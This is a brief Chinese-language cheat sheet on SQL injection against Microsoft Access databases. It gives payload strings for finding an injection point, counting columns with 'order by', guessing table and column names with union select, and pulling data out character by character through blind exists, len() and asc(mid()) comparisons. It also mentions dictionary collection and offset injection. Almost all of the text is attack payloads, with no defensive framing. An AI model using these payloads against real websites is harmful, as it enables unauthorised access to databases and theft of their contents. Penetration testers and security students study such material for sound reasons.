sql注入--access

access数据库结构:

　　表名  -->  列名  -->  数据

access注入攻击片断

　　联合查询法:

　　　　(1)  判断注入点:  ?id=1 and 1=1 ; ?id=1 and 1=2

　　　　(2)  猜解表长度:  ?id=1 order by 3

　　　　(3)  猜解表名:  ?id=1 union select 1,2,3 from 表名 

　　　　(4)  猜解列名:  ?id=1 union select  列名,2,3 from  表名

　　　　(5)  猜解数据

　　逐字猜解法:

　　　　(1)  查表：?id=1 and exists (select * from 表名)

　　　　(2)  查列：?id=1 and exists (select 列名 from 表名)

　　　　(3)  查数据：1.肯定长度

　　　　　　　　　　　　?id=1 and (select top 1 len(列名) from 表名)=5

　　　　　　　　　　2.肯定asc数据(asc编码)　　　　

　　　　　　　　　　　　?id=1 and (select top 1 asc(mid(列名,位数,1)) from 表名)=97

　　其余方法:

　　　　(1)字典文件收集（社工）

　　　　(2)Access偏移注入